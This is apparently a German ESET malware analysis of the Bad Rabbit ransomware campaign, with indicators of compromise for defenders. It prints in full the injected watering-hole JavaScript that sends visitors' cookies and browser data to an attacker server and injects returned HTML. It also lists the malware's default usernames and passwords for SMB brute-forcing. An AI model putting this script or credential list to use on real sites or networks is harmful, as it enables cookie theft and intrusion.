Eine neue Ransomware-Welle hat die Ukraine getroffen. Die Cyberattacke richtete sich hauptsächlich gegen den U-Bahn-Betrieb in Kiew sowie etliche Regierungsbehörden. Von der Ransomware kompromittierte Computer sind durch die Verschlüsselung nicht mehr zu bedienen. In diesem Beitrag gehen wir auf ein paar technische Details der Cyberattacke Bad Rabbit ein.

Drive-by-Download auf populären Webseiten durch Watering Hole Cyberattacke

Eine Verbreitungsmethode von Bad Rabbit ist der Drive-by-Download. Einige häufig besuchte Webseiten wurden kompromittiert, um ein JavaScript in den HTML-Body oder in eine der .js Dateien einzupflanzen.

Hier ist eine Version der JavaScript Injection:

function e(d) {
  var xhr = null;
  if (!!window.XMLHttpRequest) {
    xhr = new XMLHttpRequest();
  } else if (!!window.ActiveXObject) {
    var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];
    for (var i = 0; i < xhrs.length; i++) {
      try {
        xhr = ActiveXObject(xhrs[i]);
        break;
      } catch (e) {}
    }
  }
  if (!!xhr) {
    xhr.open('POST', 'http://185.149.120\.3/scholargoogle/');
    xhr.timeout = 10000;
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4 && xhr.status == 200) {
        var resp = xhr.responseText;
        if (resp) {
          var fans = JSON.parse(resp);
          if (fans) {
            var an_s = decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');
            var da = document.createElement('div');
            da.id = 'ans';
            da.innerHTML = an_s;
            document.body.appendChild(da);
          }
        }
      }
    };
    var pd = [];
    for (var k in d) {
      if (d.hasOwnProperty(k)) {
        pd.push(k + '=' + d[k]);
      }
    }
    var dc = pd.join('&');
    xhr.send(dc);
  }
}
e({
  'agent': navigator.userAgent,
  'referer': document.referrer,
  'cookie': document.cookie,
  'domain': window.location.hostname,
  'c_state': !!document.cookie
});

Dieses Script kommuniziert mit der IP-Adresse 185.149.120[.]3, welche momentan nicht zu antworten scheint. Übersendet werden folgende Daten:

  • Browser User-Agent
  • Referrer
  • Cookie der besuchten Seite
  • Domain Name der besuchten Seite

Die serverseitige Logik bestimmt darauf hin, ob ein Besucher von Interesse ist und ob der schädliche Inhalt ausgegeben werden soll. In diesem Fall taucht auf dem Bildschirm des ausgewählten Opfers ein Hinweis auf, den Flash Player zu aktualisieren.

Mit dem Klicken auf den „Install“-Button beginnt ein Download einer ausführbaren Datei von 1dnscontrol[.]com. Die ausführbare Datei install_flash_player.exe ist der Dropper für Win32/Diskcoder.D.

Letztendlich wird der Computer verschlüsselt und die folgende Erpresser-Nachricht erscheint auf dem Display:

Die Lösegeldforderung:

Verteilung via SMB

Win32/Diskcoder.D kann sich über Server Message Blocks (SMBs) verteilen. Im Gegensatz zu anderen Meinungen, nutzt die Malware nicht die EternalBlue Schwachstelle aus, wie Win32/Diskcoder.C (Not-Petya).
Zunächst wird das interne Netzwerk nach einem offenen SMB Share durchsucht, wie beispielsweise:

  • admin
  • atsvc
  • browser
  • eventlog
  • lsarpc
  • netlogon
  • ntsvcs
  • spoolss
  • samr
  • srvsvc
  • scerpc
  • svcctl
  • wkssvc

Auf dem kompromittierten Computer wird Mimikatz gestartet, um Windows-Anmeldeinformationen zu stehlen. Darüber hinaus bringt die Malware eine Reihe von Usernamen und Passwörtern mit.

Usernames Passwords
Administrator Administrator
Admin administrator
Guest Guest
User guest
User1 User
user-1 user
Test Admin
root adminTest
buh test
boss root
ftp 123
rdp 1234
rdpuser 12345
rdpadmin 123456
manager 1234567
support 12345678
work 123456789
other user 1234567890
operator Administrator123
backup administrator123
asus Guest123
ftpuser guest123
ftpadmin User123
nas user123
nasuser Admin123
nasadmin admin123Test123
superuser test123
netguest password
alex 111111
55555
77777
777
qwe
qwe123
qwe321
qwer
qwert
qwerty
qwerty123
zxc
zxc123
zxc321
zxcv
uiop
123321
321
love
secret
sex
god

Nach dem Finden richtiger Anmeldeinformationen wird die infpub.dat Datei in das Windows-Verzeichnis kopiert und mit Hilfe des SCManager und via rundll.exe ausgeführt.

Verschlüsselung

Win32/Diskcoder.D ist eine modifizierte Version von Win32/Diskcoder.C. Bugs in der Dateiverschlüsselung wurden behoben. Nun basiert die Verschlüsselung auf DiskCryptor – einer legitimen Open Source Verschlüsselungssoftware, welche normalerweise ganze Festplatten verschlüsselt. Verschlüsselungsschlüssel werden von Zuhilfenahme von CryptGenRandom erstellt und dann durch einen hardcodierten RSA 2048 Schlüssel geschützt. Wie vorher findet auch AES-128-CBC Anwendung.

Verbreitung der Bad Rabbit Ransomware

Interessanterweise ergeben die ESET Telemetrie-Daten, dass die ukrainischen Accounts diesmal nicht am meisten betroffen waren. Hier ist die Statistik:

  • Russia: 65%
  • Ukraine: 12.2%
  • Bulgaria: 10.2%
  • Turkey: 6.4%
  • Japan: 3.8%
  • Other: 2.4%

Die Zahlen spiegeln insgesamt in etwa auch die Verteilung der mit dem JavaScript kompromittierten Webseiten wider.

Zu guter Letzt möchten wir noch anmerken, dass alle Behörden und Unternehmen zur selben Zeit getroffen wurden. Dieser Umstand lässt uns vermuten, dass die Cyberkriminellen bereits einen Fuß in den Netzwerken hatten und die Watering Hole Cyberattacke nur per Knopfdruck starten mussten. Wir können nicht mit Sicherheit sagen, wer auf das „Flash-Update“ hereingefallen ist. ESET untersucht die Bad Rabbit Ransomware Cyberattacke nach wie vor. Wenn sich Neuigkeiten ergeben, werden sie hier veröffentlicht.

Samples

SHA-1 Filename ESET Detection name Description
79116fe99f2b421c52ef64097f0f39b815b20907 infpub.dat Win32/Diskcoder.D Diskcoder
afeee8b4acff87bc469a6f0364a81ae5d60a2add dispci.exe Win32/Diskcoder.D Lockscreen
413eba3973a15c1a6429d9f170f3e8287f98c21c Win32/RiskWare.Mimikatz.X Mimikatz (32-bits)
16605a4a29a101208457c47ebfde788487be788d Win64/Riskware.Mimikatz.X Mimikatz (64-bits)
de5c8d858e6e41da715dca1c019df0bfb92d32c0 install_flash_player.exe Win32/Diskcoder.D Dropper
4f61e154230a64902ae035434690bf2b96b4e018 page-main.js JS/Agent.NWC JavaScript on compromised sites

C&C Server

Zahlung des Lösegelds: http://caforssztxqzf2nm[.]onion

Inject URL: http://185.149.120[.]3/scholargoogle/

Verbreitungs-URL: hxxp://1dnscontrol[.]com/flash_install.php

Liste der kompromittierten Webseiten:

  • hxxp://argumentiru[.]com
  • hxxp://www.fontanka[.]ru
  • hxxp://grupovo[.]bg
  • hxxp://www.sinematurk[.]com
  • hxxp://www.aica.co[.]jp
  • hxxp://spbvoditel[.]ru
  • hxxp://argumenti[.]ru
  • hxxp://www.mediaport[.]ua
  • hxxp://blog.fontanka[.]ru
  • hxxp://an-crimea[.]ru
  • hxxp://www.t.ks[.]ua
  • hxxp://most-dnepr[.]info
  • hxxp://osvitaportal.com[.]ua
  • hxxp://www.otbrana[.]com
  • hxxp://calendar.fontanka[.]ru
  • hxxp://www.grupovo[.]bg
  • hxxp://www.pensionhotel[.]cz
  • hxxp://www.online812[.]ru
  • hxxp://www.imer[.]ro
  • hxxp://novayagazeta.spb[.]ru
  • hxxp://i24.com[.]ua
  • hxxp://bg.pensionhotel[.]com
  • hxxp://ankerch-crimea[.]ru